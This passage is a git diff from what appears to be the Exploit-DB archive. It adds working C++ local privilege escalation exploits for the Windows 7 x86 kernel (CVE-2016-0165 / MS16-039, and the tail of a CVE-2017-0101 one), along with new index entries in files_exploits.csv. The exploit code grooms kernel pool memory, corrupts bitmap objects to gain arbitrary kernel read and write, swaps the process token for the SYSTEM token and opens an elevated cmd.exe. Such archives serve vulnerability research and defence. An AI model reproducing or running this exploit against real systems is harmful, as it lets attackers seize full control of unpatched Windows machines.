+        {
+            break;
+        }
+        PATRECT ppb[1] = { 0 };
+        ppb[0].nXLeft  = 0x100;
+        ppb[0].nYLeft  = 0x100;
+        ppb[0].nWidth  = 0x100;
+        ppb[0].nHeight = 0x100;
+        ppb[0].hBrush  = hbru;
+        pfnPolyPatBlt(hdc, PATCOPY, ppb, 1, 0);
+
+        std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
+        bReturn = xxRetrieveBitmapBits();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        // std::cout << "OUTPUT BITMAP BITS..." << std::endl;
+        // xxOutputBitmapBits();
+
+        std::cout << "LOCATE EXTEND PALETTE..." << std::endl;
+        bReturn = xxGetExtendPalette((HPALETTE)pBmpHunted[iExtPaleHmgr]);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        if ((pBmpHunted[iExtcEntries]) != 0x64 ||
+            (pBmpHunted[iExtPalColor] & 0xFFF) != 0x00000E54)
+        {
+            bReturn = FALSE;
+            std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtPalColor] << std::endl;
+            break;
+        }
+        iMemHunted = (pBmpHunted[iExtPalColor] & ~0xFFF);
+        std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
+        std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
+        bReturn = xxFixHuntedPoolHeader();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
+        bReturn = xxFixHuntedBitmapObject();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "-------------------" << std::endl;
+        std::cout << "PRIVILEGE ELEVATION" << std::endl;
+        std::cout << "-------------------" << std::endl;
+        xxPrivilegeElevation();
+        std::cout << "-------------------" << std::endl;
+
+        std::cout << "DELETE BITMAPS (2)..." << std::endl;
+        xxDeleteBitmaps();
+
+        std::cout << "DELETE PALETTES (1)..." << std::endl;
+        xxDeletePalettes();
+
+        bReturn = TRUE;
+    } while (FALSE);
+
+    if (bReturn == FALSE)
+    {
+        std::cout << GetLastError() << std::endl;
+    }
+
+    POCDEBUG_BREAK();
+    std::cout << "DELETE BRUSH..." << std::endl;
+    DeleteObject(hbru);
+    DeleteObject(hbmp);
+
+    std::cout << "UNREGISTER WINDOW CLASSES (1)..." << std::endl;
+    xxUnregisterWndClasses();
+
+    std::cout << "-------------------" << std::endl;
+    getchar();
+    return 0;
+}
+
+INT main(INT argc, CHAR *argv[])
+{
+    POC_CVE20170101();
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44480.cpp b/exploits/windows_x86/local/44480.cpp
new file mode 100644
index 000000000..76c9a13a7
--- /dev/null
+++ b/exploits/windows_x86/local/44480.cpp
@@ -0,0 +1,663 @@
+#include <Windows.h>
+#include <wingdi.h>
+#include <iostream>
+#include <Psapi.h>
+#pragma comment(lib, "psapi.lib")
+
+#define POCDEBUG 0
+
+#if POCDEBUG == 1
+#define POCDEBUG_BREAK() getchar()
+#elif POCDEBUG == 2
+#define POCDEBUG_BREAK() DebugBreak()
+#else
+#define POCDEBUG_BREAK()
+#endif
+
+static HBITMAP hBmpHunted = NULL;
+static HBITMAP hBmpExtend = NULL;
+static DWORD   iMemHunted = NULL;
+static PDWORD  pBmpHunted = NULL;
+CONST LONG maxCount = 0x6666667;
+CONST LONG maxLimit = 0x04E2000;
+CONST LONG maxTimes = 4000;
+CONST LONG tmpTimes = 5500;
+static POINT   point[maxCount] = { 0, 0 };
+static HBITMAP hbitmap[maxTimes] = { NULL };
+static HACCEL  hacctab[tmpTimes] = { NULL };
+CONST LONG iExtHeight = 948;
+CONST LONG iExtpScan0 = 951;
+
+static
+VOID
+xxCreateClipboard(DWORD Size)
+{
+    PBYTE Buffer = (PBYTE)malloc(Size);
+    FillMemory(Buffer, Size, 0x41);
+    Buffer[Size - 1] = 0x00;
+    HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size);
+    CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size);
+    GlobalUnlock(hMem);
+    SetClipboardData(CF_TEXT, hMem);
+}
+
+static
+BOOL xxPoint(LONG id, DWORD Value)
+{
+    LONG iLeng = 0x00;
+    pBmpHunted[id] = Value;
+    iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
+    if (iLeng < 0x1000)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
+{
+    LONG iLeng = 0;
+    pBmpHunted[iExtpScan0] = addr;
+    iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
+    if (iLeng < 0x1000)
+    {
+        return FALSE;
+    }
+    iLeng = SetBitmapBits(hBmpExtend, cb, pvBits);
+    if (iLeng < (LONG)cb)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
+{
+    LONG iLeng = 0;
+    pBmpHunted[iExtpScan0] = addr;
+    iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
+    if (iLeng < 0x1000)
+    {
+        return FALSE;
+    }
+    iLeng = GetBitmapBits(hBmpExtend, cb, pvBits);
+    if (iLeng < (LONG)cb)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+VOID xxInitPoints(VOID)
+{
+    for (LONG i = 0; i < maxCount; i++)
+    {
+        point[i].x = (i % 2) + 1;
+        point[i].y = 100;
+    }
+    for (LONG i = 0; i < 75; i++)
+    {
+        point[i].y = i + 1;
+    }
+}
+
+static
+BOOL xxDrawPolyLines(HDC hdc)
+{
+    for (LONG i = maxCount; i > 0; i -= min(maxLimit, i))
+    {
+        // std::cout << ":" << (PVOID)i << std::endl;
+        if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i)))
+        {
+            return FALSE;
+        }
+    }
+    return TRUE;
+}
+
+static
+BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
+{
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
+        if (hbitmap[i] == NULL)
+        {
+            return FALSE;
+        }
+    }
+    return TRUE;
+}
+
+static
+BOOL xxCreateAcceleratorTables(VOID)
+{
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < tmpTimes; i++)
+    {
+        ACCEL acckey[0x0D] = { 0 };
+        hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D);
+        if (hacctab[i] == NULL)
+        {
+            return FALSE;
+        }
+    }
+    return TRUE;
+}
+
+static
+BOOL xxDeleteBitmaps(VOID)
+{
+    BOOL bReturn = FALSE;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        bReturn = DeleteObject(hbitmap[i]);
+        hbitmap[i] = NULL;
+    }
+    return bReturn;
+}
+
+static
+VOID xxCreateClipboards(VOID)
+{
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        xxCreateClipboard(0xB5C);
+    }
+}
+
+static
+BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e)
+{
+    BOOL bReturn = FALSE;
+    for (LONG i = b; i < e; i++)
+    {
+        bReturn = DestroyAcceleratorTable(hacctab[i]);
+        hacctab[i] = NULL;
+    }
+    return bReturn;
+}
+
+static
+VOID xxDeleteAcceleratorTables(VOID)
+{
+    for (LONG i = 0; i < tmpTimes; i++)
+    {
+        if (hacctab[i] == NULL)
+        {
+            continue;
+        }
+        DestroyAcceleratorTable(hacctab[i]);
+        hacctab[i] = NULL;
+    }
+}
+
+static
+BOOL xxRetrieveBitmapBits(VOID)
+{
+    pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
+    ZeroMemory(pBmpHunted, 0x1000);
+    LONG index = -1;
+    LONG iLeng = -1;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
+        if (iLeng < 0x2D0)
+        {
+            continue;
+        }
+        index = i;
+        std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
+        hBmpHunted = hbitmap[i];
+        break;
+    }
+    if (index == -1)
+    {
+        std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxGetExtendPalette(VOID)
+{
+    PVOID pBmpExtend = malloc(0x1000);
+    LONG index = -1;
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < maxTimes; i++)
+    {
+        if (hbitmap[i] == hBmpHunted)
+        {
+            continue;
+        }
+        if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0)
+        {
+            continue;
+        }
+        index = i;
+        std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
+        hBmpExtend = hbitmap[i];
+        break;
+    }
+    free(pBmpExtend);
+    pBmpExtend = NULL;
+    if (index == -1)
+    {
+        std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+VOID xxOutputBitmapBits(VOID)
+{
+    POCDEBUG_BREAK();
+    for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
+    {
+        std::cout << '[';
+        std::cout.fill('0');
+        std::cout.width(4);
+        std::cout << i << ']' << (PVOID)pBmpHunted[i];
+        if (((i + 1) % 4) != 0)
+        {
+            std::cout << " ";
+        }
+        else
+        {
+            std::cout << std::endl;
+        }
+    }
+    std::cout.width(0);
+}
+
+static
+BOOL xxFixHuntedPoolHeader(VOID)
+{
+    DWORD szInputBit[0x100] = { 0 };
+    CONST LONG iTrueCbdHead = 205;
+    CONST LONG iTrueBmpHead = 937;
+    szInputBit[0] = pBmpHunted[iTrueCbdHead + 0];
+    szInputBit[1] = pBmpHunted[iTrueCbdHead + 1];
+    BOOL bReturn = FALSE;
+    bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
+    szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
+    bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL xxFixHuntedBitmapObject(VOID)
+{
+    DWORD szInputBit[0x100] = { 0 };
+    szInputBit[0] = (DWORD)hBmpHunted;
+    BOOL bReturn = FALSE;
+    bReturn = xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04);
+    if (!bReturn)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+DWORD_PTR
+xxGetNtoskrnlAddress(VOID)
+{
+    DWORD_PTR AddrList[500] = { 0 };
+    DWORD cbNeeded = 0;
+    EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
+    return AddrList[0];
+}
+
+static
+DWORD_PTR
+xxGetSysPROCESS(VOID)
+{
+    DWORD_PTR Module = 0x00;
+    DWORD_PTR NtAddr = 0x00;
+    Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
+    NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+    FreeLibrary((HMODULE)Module);
+    NtAddr = NtAddr - Module;
+    Module = xxGetNtoskrnlAddress();
+    if (Module == 0x00)
+    {
+        return 0x00;
+    }
+    NtAddr = NtAddr + Module;
+    if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
+    {
+        return 0x00;
+    }
+    return NtAddr;
+}
+
+CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
+CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
+
+static
+DWORD_PTR
+xxGetTarPROCESS(DWORD_PTR SysPROC)
+{
+    if (SysPROC == 0x00)
+    {
+        return 0x00;
+    }
+    DWORD_PTR point = SysPROC;
+    DWORD_PTR value = 0x00;
+    do
+    {
+        value = 0x00;
+        xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
+        if (value == 0x00)
+        {
+            break;
+        }
+        if (value == GetCurrentProcessId())
+        {
+            return point;
+        }
+        value = 0x00;
+        xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
+        if (value == 0x00)
+        {
+            break;
+        }
+        point = value - off_EPROCESS_ActiveLinks;
+        if (point == SysPROC)
+        {
+            break;
+        }
+    } while (TRUE);
+    return 0x00;
+}
+
+CONST LONG off_EPROCESS_Token = 0x0f8;
+static DWORD_PTR dstToken = 0x00;
+static DWORD_PTR srcToken = 0x00;
+
+static
+BOOL
+xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
+{
+    if (dstPROC == 0x00 || srcPROC == 0x00)
+    {
+        return FALSE;
+    }
+    // get target process original token pointer
+    xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
+    if (dstToken == 0x00)
+    {
+        return FALSE;
+    }
+    // get system process token pointer
+    xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
+    if (srcToken == 0x00)
+    {
+        return FALSE;
+    }
+    // modify target process token pointer to system
+    xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
+    // just test if the modification is successful
+    DWORD_PTR tmpToken = 0x00;
+    xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
+    if (tmpToken != srcToken)
+    {
+        return FALSE;
+    }
+    return TRUE;
+}
+
+static
+BOOL
+xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
+{
+    if (dstPROC == 0x00 || srcPROC == 0x00)
+    {
+        return FALSE;
+    }
+    if (dstToken == 0x00 || srcToken == 0x00)
+    {
+        return FALSE;
+    }
+    // recover the original token pointer to target process
+    xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
+    return TRUE;
+}
+
+static
+VOID xxCreateCmdLineProcess(VOID)
+{
+    STARTUPINFO si = { sizeof(si) };
+    PROCESS_INFORMATION pi = { 0 };
+    si.dwFlags = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOW;
+    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
+    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
+    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
+}
+
+static
+VOID xxPrivilegeElevation(VOID)
+{
+    BOOL bReturn = FALSE;
+    do
+    {
+        DWORD SysPROC = 0x0;
+        DWORD TarPROC = 0x0;
+        POCDEBUG_BREAK();
+        SysPROC = xxGetSysPROCESS();
+        if (SysPROC == 0x00)
+        {
+            break;
+        }
+        std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
+        POCDEBUG_BREAK();
+        TarPROC = xxGetTarPROCESS(SysPROC);
+        if (TarPROC == 0x00)
+        {
+            break;
+        }
+        std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
+        POCDEBUG_BREAK();
+        bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
+        if (!bReturn)
+        {
+            break;
+        }
+        std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
+        std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
+        POCDEBUG_BREAK();
+        xxCreateCmdLineProcess();
+        POCDEBUG_BREAK();
+        std::cout << "RECOVER TOKEN..." << std::endl;
+        bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
+        if (!bReturn)
+        {
+            break;
+        }
+        bReturn = TRUE;
+    } while (FALSE);
+    if (!bReturn)
+    {
+        std::cout << "FAILED" << std::endl;
+    }
+}
+
+INT POC_CVE20160165(VOID)
+{
+    std::cout << "-------------------" << std::endl;
+    std::cout << "POC - CVE-2016-0165" << std::endl;
+    std::cout << "-------------------" << std::endl;
+
+    BOOL bReturn = FALSE;
+
+    do
+    {
+        std::cout << "INIT POINTS..." << std::endl;
+        xxInitPoints();
+
+        HDC hdc = GetDC(NULL);
+        std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
+        if (hdc == NULL)
+        {
+            bReturn = FALSE;
+            break;
+        }
+
+        std::cout << "BEGIN DC PATH..." << std::endl;
+        bReturn = BeginPath(hdc);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "DRAW POLYLINES..." << std::endl;
+        bReturn = xxDrawPolyLines(hdc);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "ENDED DC PATH..." << std::endl;
+        bReturn = EndPath(hdc);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "CREATE BITMAPS (1)..." << std::endl;
+        bReturn = xxCreateBitmaps(0xE34, 0x01, 8);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "CREATE ACCTABS (1)..." << std::endl;
+        bReturn = xxCreateAcceleratorTables();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "DELETE BITMAPS (1)..." << std::endl;
+        xxDeleteBitmaps();
+
+        std::cout << "CREATE CLIPBDS (1)..." << std::endl;
+        xxCreateClipboards();
+
+        std::cout << "CREATE BITMAPS (2)..." << std::endl;
+        bReturn = xxCreateBitmaps(0x01, 0xB1, 32);
+
+        std::cout << "DELETE ACCTABS (H)..." << std::endl;
+        xxDigHoleInAcceleratorTables(2000, 4000);
+
+        std::cout << "PATH TO REGION..." << std::endl;
+        POCDEBUG_BREAK();
+        HRGN hrgn = PathToRegion(hdc);
+        if (hrgn == NULL)
+        {
+            bReturn = FALSE;
+            break;
+        }
+        std::cout << "DELETE REGION..." << std::endl;
+        DeleteObject(hrgn);
+
+        std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
+        bReturn = xxRetrieveBitmapBits();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        // std::cout << "OUTPUT BITMAP BITS..." << std::endl;
+        // xxOutputBitmapBits();
+
+        std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl;
+        POCDEBUG_BREAK();
+        bReturn = xxPoint(iExtHeight, 0xFFFFFFFF);
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "LOCATE EXTEND BITMAP..." << std::endl;
+        bReturn = xxGetExtendPalette();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC)
+        {
+            bReturn = FALSE;
+            std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl;
+            break;
+        }
+        iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000;
+        std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
+        std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
+        bReturn = xxFixHuntedPoolHeader();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
+        bReturn = xxFixHuntedBitmapObject();
+        if (!bReturn)
+        {
+            break;
+        }
+
+        std::cout << "-------------------" << std::endl;
+        std::cout << "PRIVILEGE ELEVATION" << std::endl;
+        std::cout << "-------------------" << std::endl;
+        xxPrivilegeElevation();
+        std::cout << "-------------------" << std::endl;
+
+        std::cout << "DELETE BITMAPS (2)..." << std::endl;
+        xxDeleteBitmaps();
+
+        std::cout << "DELETE ACCTABS (3)..." << std::endl;
+        xxDeleteAcceleratorTables();
+        bReturn = TRUE;
+    } while (FALSE);
+
+    if (!bReturn)
+    {
+        std::cout << GetLastError() << std::endl;
+    }
+    std::cout << "-------------------" << std::endl;
+    getchar();
+    return 0;
+}
+
+INT main(INT argc, CHAR *argv[])
+{
+    POC_CVE20160165();
+    return 0;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1a3824d40..b411eb0c0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9657,6 +9657,12 @@ id,file,description,date,author,type,platform,port
 44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
 44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows,
 44470,exploits/windows/local/44470.py,"CloudMe Sync 1.11.0 - Local Buffer Overflow",2018-04-16,"Prasenjit Kanti Paul",local,windows,
+44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
+44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
+44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows,
+44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
+44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
+44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16406,6 +16412,8 @@ id,file,description,date,author,type,platform,port
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
 44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
+44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
+44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39159,8 +39167,9 @@ id,file,description,date,author,type,platform,port
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 -  Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
-44448,exploits/php/webapps/44448.py,"Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
+44448,exploits/php/webapps/44448.py,"Drupal  < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
 44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
-44449,exploits/php/webapps/44449.rb,"Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,
+44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
+44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,